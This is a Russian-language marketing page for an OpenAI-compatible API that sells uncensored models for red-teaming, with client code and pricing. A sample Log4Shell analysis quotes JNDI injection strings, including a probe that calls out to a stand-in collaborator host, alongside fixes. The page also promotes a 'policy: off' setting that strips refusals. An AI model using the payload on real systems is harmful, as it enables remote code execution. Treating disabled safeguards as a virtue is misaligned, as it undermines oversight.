Мейнстримные модели отвечают бипом. Мы его убираем.
OpenAI-совместимый API для моделей без ограничений, созданный для разработчиков, — для red-teaming, оценки джейлбрейков, исследований безопасности и всего, где нельзя отделаться фальшивым отказом.
Названы по тому, что они делают, а не по открытой модели под капотом, — так мы можем улучшать веса, никогда не ломая ваш код.
Модель по умолчанию. Окно в 256K токенов, без цензуры — рабочая лошадка на каждый день для red-teaming, evals и исследований.
Флагманский уровень. Контекст в 1M токенов для самых больших задач — целые кодовые базы, длинные транскрипты, глубокий анализ множества документов.
Дешёвый и быстрый вариант. Ниже стоимость токена для высоконагруженного трафика и простых вызовов.
Red-team-сессия по Log4Shell: первопричина, безопасная проверка в лаборатории и исправление. Без нотаций и отказов — только анализ.
CVE-2021-44228 (Log4Shell). Первопричина, и как JNDI-lookup превращается в RCE.${…} внутри строк, которые логирует. Залогированное значение вида ${jndi:ldap://host/x} заставляет JVM разрешить это имя через LDAP/RMI, скачать удалённый Java-класс и инстанцировать его — произвольный код выполняется в процессе логирования. Поверхность атаки — всё, что доходит до вызова логгера: User-Agent, заголовки, поля форм. Уязвимый диапазон: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} в заголовке, который точно попадает в лог.<token> означает, что строка была интерполирована → уязвимо. Ничего не отдаётся, значит ничего не выполняется.JndiLookup.class и сверь версии с уязвимым диапазоном.2.17.1+. Пока нельзя? Задай log4j2.formatMsgNoLookups=true (2.10+) или вырежи JndiLookup.class из classpath, добавь WAF-правило на ${jndi: и ограничь исходящий LDAP/RMI-трафик хоста.API полностью совместим с OpenAI: замените base URL и ключ — ваш код, SDK и инструменты продолжат работать.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node и любой инструмент, говорящий на Chat Completions API. Ничего нового учить не нужно.
text/event-stream из delta-чанков, завершающийся [DONE], — ровно то, что ваш клиент уже умеет разбирать.
Отправьте "policy": "research", чтобы пометить запрос в истории использования, или "strict", чтобы включить блок-лист, когда это нужно проекту.
Покупайте кредит, когда он нужен, или подключите месячный тариф — и он будет приходить сам. Каждый запрос тарифицируется по фактически потреблённым токенам по опубликованной цене за миллион для вызванной модели.
unbleep $3.00 вход / $3.00 выход
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
за 1M токенов
Пополняйте кредит картой, когда нужно, или пусть тариф доставляет его каждый месяц. Он не сгорает, пока аккаунт открыт, а неиспользованный кредит можно вернуть в течение 14 дней.
Когда запрос начинается, мы резервируем оценочную сумму, а по завершении списываем реальную стоимость токенов. Запрос, завершившийся ошибкой, освобождается и никогда не оплачивается.
Запрос отклоняется, если баланс его не покрывает, — мы никогда не даём в долг и не выставляем счёт постфактум. Баланс и расход токенов видны в консоли.
unbleep — для команд безопасности, исследователей и разработчиков, которым нужен нефильтрованный базовый уровень. Нулевое хранение по умолчанию, полноценный регулятор policy, история использования и стоимости по каждому запросу в консоли и настоящая политика допустимого использования. Отсутствие цензуры — это возможность; как ею управлять, решаете вы.